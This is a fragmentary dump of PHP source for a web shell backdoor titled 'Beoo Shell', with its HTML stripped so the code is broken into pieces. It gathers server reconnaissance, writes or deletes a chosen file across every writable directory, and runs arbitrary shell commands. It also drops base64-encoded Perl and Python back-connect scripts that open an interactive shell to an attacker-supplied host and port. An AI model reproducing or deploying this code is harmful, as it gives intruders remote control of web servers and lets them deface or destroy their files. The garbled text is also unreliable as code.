Beoo Shell Backdoor
"; if(isset($_7['path'])){ $path = unhex($_7['path']); chdir($path); }else{ $path = $gcw(); } $path = str_replace('\\','/',$path); $paths = explode('/',$path); foreach($paths as $id=>$pat){ if($pat == '' && $id == 0){ $a = true; echo ":/"; continue; } if($pat == '') continue; echo "".$pat."/"; } $scand = scandir($path); echo " [ ".w($path, p($path))." ]"; $sql = ($GLOBALS['fungsi'][5]('mysql_connect')) ? "User:
PHP Version:
Software:
Domain:
Server Ip:
Your Ip:
Safe Mode: $sm
MySQL: $sql | Perl: $pl | WGET: $wget | CURL: $curl | Python: $py | Pkexec: $pxex | GCC: $gcc
Disable Function:
$disfc
"; $fungsi[2]($▚, $contents_sc); $▟ = mass_all($dirc,$namefile,$contents_sc); } } } } } } function mass_onedir($dir,$namefile,$contents_sc) { if(is_writable($dir)) { $dira = scandir($dir); foreach($dira as $dirb) { $dirc = "$dir/$dirb"; $▚ = $dirc.'/'.$namefile; if($dirb === '.') { $fungsi[2]($▚, $contents_sc); } elseif($dirb === '..') { $fungsi[2]($▚, $contents_sc); } else { if($fungsi[1]($dirc)) { if(is_writable($dirc)) { echo "[
"; $fungsi[2]($▚, $contents_sc); } } } } } } if($_7['start']) { if($_7['tipe'] == 'mass') { mass_all($_7['d_dir'], $_7['d_file'], $_7['script']); } elseif($_7['tipe'] == 'onedir') { mass_onedir($_7['d_dir'], $_7['d_file'], $_7['script']); } } s(); echo "
"; } else { echo "[
"; } } $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "$dir/$dirb"; if ($dirb === '.' || $dirb === '..') { continue; } if (is_dir($dirc)) { mass_delete($dirc, $namefile); } } } } if ($_7['start']) { mass_delete($_7['d_dir'], $_7['d_file']); } s(); echo "
$out\n".exe("ps aux | grep bp.pl").""; $GLOBALS['fungsi'][4]("bp.pl"); } if($_7['bc'] == 'perl'){ $bc = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"); $plbc = @fopen('bc.pl','w'); fwrite($plbc,$bc); $out = exe("perl bc.pl ".$_7['server']." ".$_7['port']." 1>/dev/null 2>&1 &"); sleep(1); echo "
$out\n".exe("ps aux | grep bc.pl").""; $GLOBALS['fungsi'][4]("bc.pl"); } if($_7['bc'] == 'python'){ $bc_py = $GLOBALS['fungsi'][6]("IyEvdXNyL2Jpbi9weXRob24NCiNVc2FnZTogcHl0aG9uIGZpbGVuYW1lLnB5IEhPU1QgUE9SVA0KaW1wb3J0IHN5cywgc29ja2V0LCBvcywgc3VicHJvY2Vzcw0KaXBsbyA9IHN5cy5hcmd2WzFdDQpwb3J0bG8gPSBpbnQoc3lzLmFyZ3ZbMl0pDQpzb2NrZXQuc2V0ZGVmYXVsdHRpbWVvdXQoNjApDQpkZWYgcHliYWNrY29ubmVjdCgpOg0KICB0cnk6DQogICAgam1iID0gc29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pDQogICAgam1iLmNvbm5lY3QoKGlwbG8scG9ydGxvKSkNCiAgICBqbWIuc2VuZCgnJydcblB5dGhvbiBCYWNrQ29ubmVjdCBCeSBNci54QmFyYWt1ZGFcblRoYW5rcyBHb29nbGUgRm9yIFJlZmVyZW5zaVxuXG4nJycpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMCkNCiAgICBvcy5kdXAyKGptYi5maWxlbm8oKSwxKQ0KICAgIG9zLmR1cDIoam1iLmZpbGVubygpLDIpDQogICAgb3MuZHVwMihqbWIuZmlsZW5vKCksMykNCiAgICBzaGVsbCA9IHN1YnByb2Nlc3MuY2FsbChbIi9iaW4vc2giLCItaSJdKQ0KICBleGNlcHQgc29ja2V0LnRpbWVvdXQ6DQogICAgcHJpbnQgIlRpbU91dCINCiAgZXhjZXB0IHNvY2tldC5lcnJvciwgZToNCiAgICBwcmludCAiRXJyb3IiLCBlDQpweWJhY2tjb25uZWN0KCk="); $pbc_py = @fopen('bcpy.py','w'); fwrite($pbc_py,$bc_py); $out_py = exe("python bcpy.py ".$_7['server']." ".$_7['port']); sleep(1); echo "
$out_py\n".exe("ps aux | grep bcpy.py").""; $GLOBALS['fungsi'][4]("bcpy.py"); } echo "
"; } if ($_7['id'] == 'cmd') { s(); $cmdResult = ''; $command = ''; if (!empty($_POST['cmd'])) { $command = htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8'); $cmdResult = shell_exec($command . ' 2>&1'); if ($cmdResult === null) { $output = array(); $return_var = 0; exec($command, $output, $return_var); $cmdResult = implode("\n", $output); if ($cmdResult === null) { $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open($command, $descriptorspec, $pipes); if (is_resource($process)) { $cmdResult = stream_get_contents($pipes[1]); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); $return_value = proc_close($process); if ($return_value !== 0) { $cmdResult = "Error: Non-zero return value ($return_value)"; } } else { $cmdResult = "Error: Failed to open process with proc_open"; } } } } echo "
~ \${$command} " . htmlspecialchars($cmdResult, ENT_QUOTES, 'UTF-8') . "
No result